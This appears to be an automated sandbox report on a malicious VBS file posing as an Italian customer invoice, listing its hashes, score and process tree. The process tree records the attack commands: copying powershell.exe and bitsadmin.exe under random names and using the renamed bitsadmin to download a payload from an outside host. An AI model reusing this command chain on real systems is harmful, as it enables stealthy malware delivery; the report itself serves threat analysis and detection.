Analysis
-
max time kernel
109s -
max time network
131s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
13-07-2020 07:25
General
-
Target
Fatt_cliente_02567110412.vbs
-
Size
3KB
-
MD5
9faef390681779584e1b8133adae555e
-
SHA1
cb3765ea99deb44f62e47c23411b19405fcc507d
-
SHA256
22c2b0edeb83c36ad3757ff81c922df3fcc124c7da452ace9e932eb0125ddc2c
-
SHA512
3faa7c7ef807d6c97b89730e5d1f0124c639addbcd96ef3f47ff0d567e7dddf34df3163bc7e0c463655f18db0e8b85ba1103c4fcc5fee3b468150056c4273cf2
Score
8/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 7 IoCs
-
Executes dropped EXE 1 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_02567110412.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zjzFO.exe2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\jzFO.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jzFO.exe"C:\Users\Admin\AppData\Roaming\jzFO.exe" /transfer JxfqxV /download https://mzgotech.com/temha/02567110412/uk.png C:\Users\Admin\AppData\Roaming\uk.png2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\jzFO.exe
-
C:\Users\Admin\AppData\Roaming\jzFO.exe
-
memory/1008-1-0x0000000000000000-mapping.dmp
-
memory/2644-0-0x0000000000000000-mapping.dmp
-
memory/3604-3-0x0000000000000000-mapping.dmp